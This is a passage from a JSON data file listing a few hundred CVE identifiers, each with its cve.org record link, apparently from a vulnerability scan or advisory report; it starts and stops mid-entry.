"url": "https://www.cve.org/CVERecord?id=CVE-2024-12243"
},
{
"name": "CVE-2024-26462",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26462"
},
{
"name": "CVE-2024-58053",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58053"
},
{
"name": "CVE-2025-38516",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38516"
},
{
"name": "CVE-2025-30693",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30693"
},
{
"name": "CVE-2025-38462",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38462"
},
{
"name": "CVE-2025-38350",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38350"
},
{
"name": "CVE-2025-38428",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38428"
},
{
"name": "CVE-2025-27363",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27363"
},
{
"name": "CVE-2018-13410",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-13410"
},
{
"name": "CVE-2025-2099",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-2099"
},
{
"name": "CVE-2025-38262",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38262"
},
{
"name": "CVE-2025-6638",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6638"
},
{
"name": "CVE-2025-21585",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21585"
},
{
"name": "CVE-2023-24531",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24531"
},
{
"name": "CVE-2025-38138",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38138"
},
{
"name": "CVE-2021-3610",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3610"
},
{
"name": "CVE-2024-58077",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58077"
},
{
"name": "CVE-2025-5283",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5283"
},
{
"name": "CVE-2025-21754",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21754"
},
{
"name": "CVE-2024-12088",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12088"
},
{
"name": "CVE-2023-24538",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24538"
},
{
"name": "CVE-2025-38035",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38035"
},
{
"name": "CVE-2023-2975",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2975"
},
{
"name": "CVE-2025-37997",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37997"
},
{
"name": "CVE-2025-24928",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24928"
},
{
"name": "CVE-2021-44717",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44717"
},
{
"name": "CVE-2025-2312",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-2312"
},
{
"name": "CVE-2025-0395",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0395"
},
{
"name": "CVE-2025-53506",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53506"
},
{
"name": "CVE-2025-21960",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21960"
},
{
"name": "CVE-2025-38310",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38310"
},
{
"name": "CVE-2025-23084",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23084"
},
{
"name": "CVE-2015-4786",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4786"
},
{
"name": "CVE-2020-14155",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14155"
},
{
"name": "CVE-2022-3602",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3602"
},
{
"name": "CVE-2025-37963",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37963"
},
{
"name": "CVE-2022-43250",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43250"
},
{
"name": "CVE-2022-40304",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-40304"
},
{
"name": "CVE-2025-38226",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38226"
},
{
"name": "CVE-2025-4947",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4947"
},
{
"name": "CVE-2023-4911",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4911"
},
{
"name": "CVE-2022-29804",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-29804"
},
{
"name": "CVE-2023-38473",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38473"
},
{
"name": "CVE-2025-38443",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38443"
},
{
"name": "CVE-2025-0725",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0725"
},
{
"name": "CVE-2023-2976",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2976"
},
{
"name": "CVE-2025-52099",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-52099"
},
{
"name": "CVE-2023-43887",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-43887"
},
{
"name": "CVE-2025-21967",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21967"
},
{
"name": "CVE-2025-7424",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7424"
},
{
"name": "CVE-2025-1094",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1094"
},
{
"name": "CVE-2021-24032",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-24032"
},
{
"name": "CVE-2025-38439",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38439"
},
{
"name": "CVE-2022-1434",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1434"
},
{
"name": "CVE-2025-41254",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-41254"
},
{
"name": "CVE-2022-21496",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21496"
},
{
"name": "CVE-2022-41723",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41723"
},
{
"name": "CVE-2020-2757",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2757"
},
{
"name": "CVE-2025-53864",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53864"
},
{
"name": "CVE-2025-38145",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38145"
},
{
"name": "CVE-2022-2598",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2598"
},
{
"name": "CVE-2020-27829",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-27829"
},
{
"name": "CVE-2024-4032",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4032"
},
{
"name": "CVE-2025-37948",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37948"
},
{
"name": "CVE-2021-27645",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-27645"
},
{
"name": "CVE-2025-21863",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21863"
},
{
"name": "CVE-2025-21856",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21856"
},
{
"name": "CVE-2025-53053",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53053"
},
{
"name": "CVE-2022-2509",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2509"
},
{
"name": "CVE-2024-28835",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28835"
},
{
"name": "CVE-2025-54388",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-54388"
},
{
"name": "CVE-2025-21749",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21749"
},
{
"name": "CVE-2017-6839",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-6839"
},
{
"name": "CVE-2023-1906",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1906"
},
{
"name": "CVE-2025-40025",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40025"
},
{
"name": "CVE-2025-38051",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38051"
},
{
"name": "CVE-2021-35556",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35556"
},
{
"name": "CVE-2025-49796",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-49796"
},
{
"name": "CVE-2022-34526",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-34526"
},
{
"name": "CVE-2025-8058",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8058"
},
{
"name": "CVE-2023-47471",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-47471"
},
{
"name": "CVE-2022-2868",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2868"
},
{
"name": "CVE-2022-1771",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1771"
},
{
"name": "CVE-2025-21945",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21945"
},
{
"name": "CVE-2021-32492",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-32492"
},
{
"name": "CVE-2023-39323",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39323"
},
{
"name": "CVE-2023-29402",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29402"
},
{
"name": "CVE-2025-55005",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55005"
},
{
"name": "CVE-2025-32955",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32955"
},
{
"name": "CVE-2025-8732",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8732"
},
{
"name": "CVE-2025-38044",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38044"
},
{
"name": "CVE-2022-1586",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1586"
},
{
"name": "CVE-2023-39326",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39326"
},
{
"name": "CVE-2024-52616",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52616"
},
{
"name": "CVE-2025-38498",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38498"
},
{
"name": "CVE-2025-40015",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40015"
},
{
"name": "CVE-2024-21085",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21085"
},
{
"name": "CVE-2025-21673",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21673"
},
{
"name": "CVE-2025-21829",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21829"
},
{
"name": "CVE-2025-21502",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21502"
},
{
"name": "CVE-2024-57999",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57999"
},
{
"name": "CVE-2018-16645",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-16645"
},
{
"name": "CVE-2025-22008",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22008"
},
{
"name": "CVE-2023-38039",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38039"
},
{
"name": "CVE-2023-29409",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29409"
},
{
"name": "CVE-2022-21443",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21443"
},
{
"name": "CVE-2025-21969",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21969"
},
{
"name": "CVE-2025-38200",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38200"
},
{
"name": "CVE-2025-40007",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40007"
},
{
"name": "CVE-2024-58072",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58072"
},
{
"name": "CVE-2025-38273",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38273"
},
{
"name": "CVE-2025-38346",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38346"
},
{
"name": "CVE-2025-55315",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55315"
},
{
"name": "CVE-2018-11813",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-11813"
},
{
"name": "CVE-2025-21722",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21722"
},
{
"name": "CVE-2024-50379",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50379"
},
{
"name": "CVE-2021-35560",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35560"
},
{
"name": "CVE-2023-39325",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39325"
},
{
"name": "CVE-2025-21793",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21793"
},
{
"name": "CVE-2022-2719",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2719"
},
{
"name": "CVE-2025-21581",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21581"
},
{
"name": "CVE-2022-45873",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-45873"
},
{
"name": "CVE-2023-34151",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-34151"
},
{
"name": "CVE-2023-51384",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-51384"
},
{
"name": "CVE-2021-43809",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-43809"
},
{
"name": "CVE-2025-5914",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5914"
},
{
"name": "CVE-2015-1606",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-1606"
},
{
"name": "CVE-2025-21894",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21894"
},
{
"name": "CVE-2025-21919",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21919"
},
{
"name": "CVE-2023-3896",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3896"
},
{
"name": "CVE-2023-2908",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2908"
},
{
"name": "CVE-2024-20945",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20945"
},
{
"name": "CVE-2025-58754",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58754"
},
{
"name": "CVE-2023-39615",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39615"
},
{
"name": "CVE-2023-24534",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24534"
},
{
"name": "CVE-2025-21854",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21854"
},
{
"name": "CVE-2017-7501",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-7501"
},
{
"name": "CVE-2024-21131",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21131"
},
{
"name": "CVE-2023-31486",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-31486"
},
{
"name": "CVE-2020-21599",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-21599"
},
{
"name": "CVE-2025-41242",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-41242"
},
{
"name": "CVE-2024-21210",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21210"
},
{
"name": "CVE-2013-0340",
"url": "https://www.cve.org/CVERecord?id=CVE-2013-0340"
},
{
"name": "CVE-2023-3446",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3446"
},
{
"name": "CVE-2025-21759",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21759"
},
{
"name": "CVE-2023-32611",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-32611"
},
{
"name": "CVE-2024-38816",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38816"
},
{
"name": "CVE-2024-2511",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-2511"
},
{
"name": "CVE-2015-20107",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-20107"
},
{
"name": "CVE-2023-39978",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39978"
},
{
"name": "CVE-2024-34397",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34397"
},
{
"name": "CVE-2025-38320",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38320"
},
{
"name": "CVE-2025-53057",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53057"
},
{
"name": "CVE-2024-24786",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24786"
},
{
"name": "CVE-2025-8177",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8177"
},
{
"name": "CVE-2025-21968",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21968"
},
{
"name": "CVE-2024-58083",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58083"
},
{
"name": "CVE-2021-20311",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-20311"
},
{
"name": "CVE-2024-58055",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58055"
},
{
"name": "CVE-2025-21991",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21991"
},
{
"name": "CVE-2023-28486",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28486"
},
{
"name": "CVE-2020-27618",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-27618"
},
{
"name": "CVE-2024-57993",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57993"
},
{
"name": "CVE-2025-21887",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21887"
},
{
"name": "CVE-2023-6246",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6246"
},
{
"name": "CVE-2021-20241",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-20241"
},
{
"name": "CVE-2017-12674",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-12674"
},
{
"name": "CVE-2023-0800",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0800"
},
{
"name": "CVE-2025-62171",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62171"
},
{
"name": "CVE-2025-38280",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38280"
},
{
"name": "CVE-2023-5388",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5388"
},
{
"name": "CVE-2018-1000078",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-1000078"
},
{
"name": "CVE-2020-2756",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2756"
},
{
"name": "CVE-2025-50950",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50950"
},
{
"name": "CVE-2020-21605",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-21605"
},
{
"name": "CVE-2024-54534",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-54534"
},
{
"name": "CVE-2023-21967",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21967"
},
{
"name": "CVE-2025-38084",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38084"
},
{
"name": "CVE-2024-34155",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34155"
},
{
"name": "CVE-2022-23219",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23219"
},
{
"name": "CVE-2017-1000476",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-1000476"
},
{
"name": "CVE-2015-2640",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-2640"
},
{
"name": "CVE-2025-30685",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30685"
},
{
"name": "CVE-2024-41123",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41123"
},
{
"name": "CVE-2025-6921",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6921"
},
{
"name": "CVE-2015-8863",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-8863"
},
{
"name": "CVE-2022-21619",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21619"
},
{
"name": "CVE-2025-30695",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30695"
},
{
"name": "CVE-2025-30688",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30688"
},
{
"name": "CVE-2023-5752",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5752"
},
{
"name": "CVE-2018-11656",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-11656"
},
{
"name": "CVE-2025-38103",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38103"
},
{
"name": "CVE-2022-2127",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2127"
},
{
"name": "CVE-2021-25217",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-25217"
},
{
"name": "CVE-2025-38514",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38514"
},
{
"name": "CVE-2018-19876",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-19876"
},
{
"name": "CVE-2025-61780",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61780"
},
{
"name": "CVE-2021-20310",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-20310"
},
{
"name": "CVE-2021-20245",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-20245"
},
{
"name": "CVE-2021-35561",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35561"
},
{
"name": "CVE-2025-21732",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21732"
},
{
"name": "CVE-2025-38569",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38569"
},
{
"name": "CVE-2022-21476",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21476"
},
{
"name": "CVE-2023-22796",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22796"
},
{
"name": "CVE-2025-21875",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21875"
},
{
"name": "CVE-2023-0361",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0361"
},
{
"name": "CVE-2025-38204",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38204"
},
{
"name": "CVE-2021-40812",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-40812"
},
{
"name": "CVE-2021-4217",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-4217"
},
{
"name": "CVE-2023-32643",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-32643"
},
{
"name": "CVE-2023-27537",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-27537"
},
{
"name": "CVE-2025-22015",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22015"
},
{
"name": "CVE-2025-53066",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53066"
},
{
"name": "CVE-2023-5678",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5678"
},
{
"name": "CVE-2024-2961",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-2961"
},
{
"name": "CVE-2025-21962",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21962"
},
{
"name": "CVE-2025-29786",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-29786"
},
{
"name": "CVE-2025-21832",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21832"
},
{
"name": "CVE-2024-12133",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12133"
},
{
"name": "CVE-2024-24784",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24784"
},
{
"name": "CVE-2022-27780",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-27780"
},
{
"name": "CVE-2018-9135",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-9135"
},
{
"name": "CVE-2025-38410",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38410"
},
{
"name": "CVE-2025-21790",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21790"
},
{
"name": "CVE-2024-52316",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52316"
},
{
"name": "CVE-2024-21217",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21217"
},
{
"name": "CVE-2021-39212",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-39212"
},
{
"name": "CVE-2024-28182",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28182"
},
{
"name": "CVE-2024-58014",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58014"
},
{
"name": "CVE-2025-21680",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21680"
},
{
"name": "CVE-2025-0167",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0167"
},
{
"name": "CVE-2017-12433",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-12433"
},
{
"name": "CVE-2025-21924",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21924"
},
{
"name": "CVE-2021-3574",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3574"
},
{
"name": "CVE-2023-6597",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6597"
},
{
"name": "CVE-2024-20952",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20952"
},
{
"name": "CVE-2022-21541",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21541"
},
{
"name": "CVE-2025-22227",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22227"
},
{
"name": "CVE-2025-47273",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47273"
},
{
"name": "CVE-2025-27221",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27221"
},
{
"name": "CVE-2024-24789",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24789"
},
{
"name": "CVE-2024-58006",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58006"
},
{
"name": "CVE-2025-21710",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21710"
},
{
"name": "CVE-2022-21360",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21360"
},
{
"name": "CVE-2025-22088",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22088"
},
{
"name": "CVE-2025-38460",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38460"
},
{
"name": "CVE-2022-27664",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-27664"
},
{
"name": "CVE-2022-25858",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-25858"
},
{
"name": "CVE-2022-21296",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21296"
},
{
"name": "CVE-2022-48303",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48303"
},
{
"name": "CVE-2025-38345",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38345"
},
{
"name": "CVE-2022-21540",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21540"
},
{
"name": "CVE-2025-21815",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21815"
},
{
"name": "CVE-2025-50083",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50083"
},
{
"name": "CVE-2024-37371",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37371"
},
{
"name": "CVE-2017-6836",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-6836"
},
{
"name": "CVE-2021-3500",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3500"
},
{
"name": "CVE-2022-25310",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-25310"
},
{
"name": "CVE-2023-38545",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38545"
},
{
"name": "CVE-2021-43618",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-43618"
},
{
"name": "CVE-2021-20251",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-20251"
},
{
"name": "CVE-2025-21669",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21669"
},
{
"name": "CVE-2016-1000027",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-1000027"
},
{
"name": "CVE-2021-33621",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-33621"
},
{
"name": "CVE-2025-57807",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-57807"
},
{
"name": "CVE-2025-38231",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38231"
},
{
"name": "CVE-2022-26488",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-26488"
},
{
"name": "CVE-2025-21716",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21716"
},
{
"name": "CVE-2024-49761",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49761"
},
{
"name": "CVE-2024-6345",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6345"
},
{
"name": "CVE-2025-3777",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-3777"
},
{
"name": "CVE-2025-21964",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21964"
},
{
"name": "CVE-2024-0567",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0567"
},
{
"name": "CVE-2018-18384",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-18384"
},
{
"name": "CVE-2024-58080",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58080"
},
{
"name": "CVE-2025-21744",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21744"
},
{
"name": "CVE-2024-21208",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21208"
},
{
"name": "CVE-2023-32665",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-32665"
},
{
"name": "CVE-2025-31498",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-31498"
},
{
"name": "CVE-2022-30698",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30698"
},
{
"name": "CVE-2023-31438",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-31438"
},
{
"name": "CVE-2024-57986",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57986"
},
{
"name": "CVE-2021-37750",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-37750"
},
{
"name": "CVE-2025-3576",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-3576"
},
{
"name": "CVE-2023-23916",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-23916"
},
{
"name": "CVE-2021-20244",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-20244"
},
{
"name": "CVE-2025-38181",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38181"
},
{
"name": "CVE-2025-21835",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21835"
},
{
"name": "CVE-2025-38391",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38391"
},
{
"name": "CVE-2025-11411",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-11411"
},
{
"name": "CVE-2020-14577",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14577"
},
{
"name": "CVE-2022-3570",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3570"
},
{
"name": "CVE-2016-9844",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-9844"
},
{
"name": "CVE-2019-13136",
